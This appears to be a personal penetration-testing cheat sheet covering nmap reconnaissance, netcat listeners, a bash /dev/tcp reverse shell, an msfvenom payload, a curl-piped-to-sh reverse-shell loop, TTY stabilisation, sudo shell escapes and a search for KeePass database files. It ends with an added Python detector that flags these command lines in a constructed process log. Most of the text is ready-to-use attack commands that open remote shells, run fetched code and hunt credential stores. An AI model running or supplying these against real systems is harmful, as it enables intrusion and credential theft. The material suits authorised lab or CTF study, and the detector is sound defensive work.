# Table of Contents

1. [information gathering](#org852ec36)
    1. [nmap](#orgda1065c)
    2. [dirb](#orgafbfb19)
2. [initial access](#orgd5250d9)
    1. [start listener:](#orgefad80b)
    2. [reverse shell bash:](#org147daab)
    3. [reverse shell file:](#org32886e3)
    4. [untested:](#org6c097fc)
3. [privilege escalation](#org6812526)
    1. [always run these:](#org0b25bb0)
    2. [TTY Spawn Shell](#org4152682)
        1. [Python spawn shell](#orgf659bfd)
        2. [OS system spawn shell](#org76c29ea)
        3. [Bash spawn shell](#org80d5744)
        4. [Perl spawn shell](#orgd4f31f3)
        5. [Ruby spawn shell](#org2fe4e07)
        6. [Lua spawn shell](#orgce64187)
        7. [IRB spawn shell](#org28402e0)
        8. [VI spawn shell](#org6bfa44c)
        9. [VI(2) spawn shell](#org4241f95)
        10. [Nmap spawn shell](#org5dc86b6)
4. [Windows](#orgdcc9f31)
    1. [WinPEAS](#org21afc9d)
    2. [LOLBAS](#org08b790e)
    3. [WADCOMS](#orgb12dcff)
    4. [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
    5. [RUN these while the other scripts are working](#orgea4f773)
    6. [for finding kdbx Files](#org0f35200)

1. To install: magic-wormhole, tldr (tealdeer), rlwrap
   ```
   sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
   ```
2. For the keyring: if there is some kind of keyring error
   ```
   sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
   ```

# information gathering

### nmap

Quick scan for live hosts:

```
nmap -sn ip/24
```

Filter the output down to the live IPs:

```
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```

Scan open ports (the inner nmap finds all open ports, the outer one runs the script/version scan only on those):

```
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```

### dirb

```
dirb http://ip
```

1. For Windows:
   ```
   nmap --script vuln ip
   ```
2. For Windows + SMB:
   ```
   nmap --script smb-vuln* ip
   ```

# initial access

### start listener:

```
rlwrap -cAr nc -nlvp 9002
```

### reverse shell bash:

```
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```

### reverse shell file:

```
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```

-> from revshells.com

### untested:

Reverse Shell as a Service

1. On your machine: `nc -l 1337` (or nlvp?)
2. On the target machine: `curl https://reverse-shell.sh/yourip:1337 | sh`
3. Reconnecting: `while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done`

# privilege escalation

## always run these:

```
sudo -l
```

If sudo doesn't work: [3.2](#org4152682)

1. Check cronjobs:
   ```
   ls /etc/cron.*
   crontab -l
   ```

## TTY Spawn Shell

1. If sudo still doesn't work, use `sudo -S command`

Often during pen tests you may obtain a shell without having a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

### Python spawn shell

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

Fully Interactive TTY

1. All the steps to stabilize your shell

**The first step:**

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

This uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys.

**Step two is:**

```
export TERM=xterm
```

This will give us access to term commands such as `clear`.

**Finally (and most importantly) we will background the shell using** Ctrl + Z. Back in our own terminal we use

```
stty raw -echo; fg
```

This does two things: first, it turns off our own terminal echo, which gives us access to tab autocomplete, the arrow keys, and Ctrl + C to kill processes; second, `fg` brings the backgrounded shell back to the foreground.

Optionally, set the terminal size to match your own terminal:

```
stty rows 38 columns 116
```

### OS system spawn shell

```
echo os.system("/bin/bash")
```

### Bash spawn shell

```
/bin/sh -i
```

### Perl spawn shell

```
perl -e 'exec "/bin/sh";'
```

### Ruby spawn shell

In ruby: `exec "/bin/sh"`

### Lua spawn shell

In lua: `os.execute("/bin/sh")`

### IRB spawn shell

```
exec "/bin/sh"
```

### VI spawn shell

```
:!bash
```

### VI(2) spawn shell

```
:set shell=/bin/bash:shell
```

### Nmap spawn shell

```
!sh
```

1. Exiftool (read metadata): `exiftool picture.png`
2. Binwalk (extract embedded binary data): `binwalk -e picture.png`

# Windows

### WinPEAS

### LOLBAS

### WADCOMS

### PrivescCheck Script as an alternative to WinPEAS

### RUN these while the other scripts are working

```
whoami /priv
whoami /all
schtasks /query
```

### for finding kdbx Files

```
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
```

Quick wins Linux:

```
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '\! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
```

evilwinrm

Links:

- https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
- https://github.com/Obedaya/scripts
- https://mygit.th-deg.de/lg06087/pentesting
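Seen from the blue-team side, as an added example that is not part of these notes: a small detector that flags the reverse-shell and TTY-upgrade command lines from the sections above when they turn up in a process execution log, and reports which user ran the whole stabilisation chain. The log format (`timestamp host user pid cmdline`), every log line and the 192.0.2.10 address are constructed for the demo.

```python
"""Detector for the reverse-shell and TTY-upgrade command lines listed in these
notes.  Added example, not part of the cheat sheet; log format and lines are constructed."""
import re

# technique label -> regex over a process command line; patterns mirror the commands above
SIGNATURES = {
    "bash /dev/tcp reverse shell": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "python pty.spawn TTY upgrade": re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]"),
    "stty raw -echo TTY upgrade": re.compile(r"\bstty\s+raw\s+-echo\b"),
    "curl piped to shell": re.compile(r"\bcurl\s+\S+\s*\|\s*(?:ba)?sh\b"),
    "interpreter spawning /bin/sh": re.compile(
        r"(?:os\.system|os\.execute|system|exec)\s*\(?\s*['\"]/bin/(?:ba)?sh"),
}

# Constructed process log, one execution per line: ts host user pid cmdline
SAMPLE_LOG = """\
2024-05-01T10:00:01 web01 www-data 4131 /bin/bash -i >& /dev/tcp/192.0.2.10/9002 0>&1
2024-05-01T10:00:07 web01 www-data 4140 python3 -c 'import pty;pty.spawn("/bin/bash")'
2024-05-01T10:00:15 web01 www-data 4152 stty raw -echo
2024-05-01T10:02:30 web01 root 4201 curl https://example.invalid/x.sh | sh
2024-05-01T10:03:00 web01 alice 4210 ls -la /etc/cron.d
2024-05-01T10:04:00 web01 bob 4222 sudo awk 'BEGIN {system("/bin/sh")}'
"""


def classify(cmdline):
    """Return the technique labels whose pattern matches this command line."""
    return [label for label, rx in SIGNATURES.items() if rx.search(cmdline)]


def scan_log(text):
    """Return (pid, user, labels) for every log line matching at least one signature."""
    hits = []
    for line in text.splitlines():
        fields = line.split(maxsplit=4)
        if len(fields) < 5:  # skip blank or malformed lines
            continue
        _ts, _host, user, pid, cmd = fields
        labels = classify(cmd)
        if labels:
            hits.append((int(pid), user, labels))
    return hits


def users_with_upgrade_chain(hits):
    """Users who both spawned a shell and ran a TTY-upgrade step: the full
    stabilisation sequence above, a much stronger signal than any single command."""
    shells, upgrades = set(), set()
    for _pid, user, labels in hits:
        for label in labels:
            (upgrades if "TTY upgrade" in label else shells).add(user)
    return shells & upgrades
```

The regexes are deliberately narrow to stay readable; a real rule set would also cover other interpreters, obfuscated arguments and the Windows commands in the last section.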